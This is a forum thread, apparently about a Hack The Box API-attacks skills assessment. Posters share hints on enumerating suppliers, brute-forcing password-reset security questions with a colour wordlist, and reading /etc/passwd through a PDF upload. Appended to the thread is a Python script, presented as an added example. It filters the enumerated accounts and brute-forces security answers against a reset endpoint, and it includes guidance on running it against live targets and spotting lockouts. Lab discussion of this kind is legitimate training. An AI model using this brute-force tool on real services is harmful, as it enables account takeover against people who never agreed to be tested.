Has anyone else had any luck with solving this? I have enumerated the supplier with a security question set but have not had any luck brute-forcing the password reset through the security question.
Thank you
If you're like me, you just need a really big wordlist.
A hint is that it is a fairly popular programming language.
Can you provide the wordlist? Because I have been searching for one.
Just to point out that attention to detail matters a lot here, so make sure to take your time and carefully inspect each response.
Another tip that I would give is to search and find different wordlists when trying a brute-force attack at any point.
Find the color wordlist on GitHub. If all goes well, then you just have to change the supplier logins.
Hello. I would like to know if this discussion is about the new module for API attack assessment? Because the discussion seems to be different from the difficulties I am facing. I am having the same error message when trying to upload a PDF file. Has anyone solved this?
Yes. Try uploading the PDF file not as the customer but as a supplier. Get a way to authenticate yourself as a supplier from the password reset options available. Let me know if you need further assistance. Cheers
Thanks for the tip. I will try that.
okay.
Hi everyone, I'm stuck with this task right now. I brute-forced the user, uploaded a PDF, and am trying to use it to update and view /etc/passwd, but nothing is working.
{
  "successStatus": false,
  "base64Data": "An error occurred while reading the file."
}
Are you reading /etc/passwd as a customer or as a supplier?
As a supplier.
I have only 2 accounts: Br**don R*gers and htbpentester.
Wait… this is the skills assessment right?
yep
I also didn’t understand the clue of the guy who said it’s a popular programming language, maybe that’s why I’m stumped.
Hey I was making the same mistake. Read the question again at the bottom of the skills assessment page, it’s not asking you to get the base64 from the /etc/passwd file path, it’s asking you something else. Hope this helps!
Does the list of colors need to be mutated or is the password all lower case?
Nevermind, worked it out
jq the list of suppliers and select(.securityQuestion != "SupplierDidNotProvideYet").
You'll end up with around 5 potential targets and all have the same question (which hints at what you should fill your wordlist with). I only had 75 words in my list.
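The workflow the thread converges on (filter the enumerated suppliers down to those with a security question set, then try a short themed wordlist against the reset check), written out as an added example. This is not code from the thread or from the lab; the supplier JSON shape, the field names, the reset endpoint URL and request format, and the sample data are all assumptions or constructed for illustration. The `check` callable is injected so the loop can be run offline against a mock oracle and swapped for the HTTP version when pointed at a real target.

```python
"""Added example: filter enumerated suppliers by security question, then
brute-force the security answer with a mutated wordlist.
Everything about the target (field names, endpoint, response shape) is an
assumption made for this illustration.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

# Sentinel the thread mentions for accounts with no question on file.
PLACEHOLDER = "SupplierDidNotProvideYet"

# Constructed sample of what a supplier-enumeration endpoint might return
# (assumption: a JSON array with 'username' and 'securityQuestion' keys).
SAMPLE_SUPPLIERS = json.dumps([
    {"id": 1, "username": "alice", "securityQuestion": PLACEHOLDER},
    {"id": 2, "username": "bob",   "securityQuestion": "What is your favorite color?"},
    {"id": 3, "username": "carol", "securityQuestion": "What is your favorite color?"},
    {"id": 4, "username": "dave",  "securityQuestion": PLACEHOLDER},
])


def targets_with_question(suppliers_json: str) -> List[dict]:
    """Python equivalent of:
    jq '.[] | select(.securityQuestion != "SupplierDidNotProvideYet")'
    """
    suppliers = json.loads(suppliers_json)
    return [s for s in suppliers if s.get("securityQuestion") != PLACEHOLDER]


def mutate(words: Iterable[str]) -> List[str]:
    """Expand a base wordlist with simple case variants (lower, Capitalized,
    UPPER), de-duplicated and in first-seen order. Answers the thread's
    'does the color list need to be mutated?' question by trying both."""
    seen, out = set(), []
    for w in words:
        for variant in (w.lower(), w.capitalize(), w.upper()):
            if variant not in seen:
                seen.add(variant)
                out.append(variant)
    return out


def brute_force_answer(check: Callable[[str, str], bool], username: str,
                       candidates: Iterable[str]) -> Optional[str]:
    """Try each candidate answer for one user; return the first accepted one.
    `check(username, answer)` must return True when the reset check passes."""
    for cand in candidates:
        if check(username, cand):
            return cand
    return None


def run(suppliers_json: str, wordlist: Iterable[str],
        check: Callable[[str, str], bool]) -> Dict[str, Optional[str]]:
    """Filter targets, then brute-force each with the mutated wordlist."""
    candidates = mutate(wordlist)
    return {s["username"]: brute_force_answer(check, s["username"], candidates)
            for s in targets_with_question(suppliers_json)}


def make_http_checker(reset_url: str) -> Callable[[str, str], bool]:
    """Build a `check` that POSTs to a password-reset endpoint.
    Assumption: the API takes JSON {username, securityAnswer} and answers with
    a JSON body carrying 'successStatus', like the error object in the thread.
    Only used when pointed at a real target; the offline demo uses a mock."""
    def check(username: str, answer: str) -> bool:
        body = json.dumps({"username": username, "securityAnswer": answer}).encode()
        req = urllib.request.Request(reset_url, data=body, method="POST",
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read().decode()).get("successStatus") is True
    return check


if __name__ == "__main__":
    # Constructed offline oracle standing in for the server: only carol/teal passes.
    oracle = lambda user, answer: (user, answer) == ("carol", "teal")
    print(run(SAMPLE_SUPPLIERS, ["red", "Blue", "teal"], oracle))
```

Against a live target the only change is `check = make_http_checker("https://<host>/api/reset")` (hypothetical path), and it is worth adding a small delay or per-user counter inside `check` so a lockout or rate limit shows up in the responses rather than being mistaken for a wrong answer.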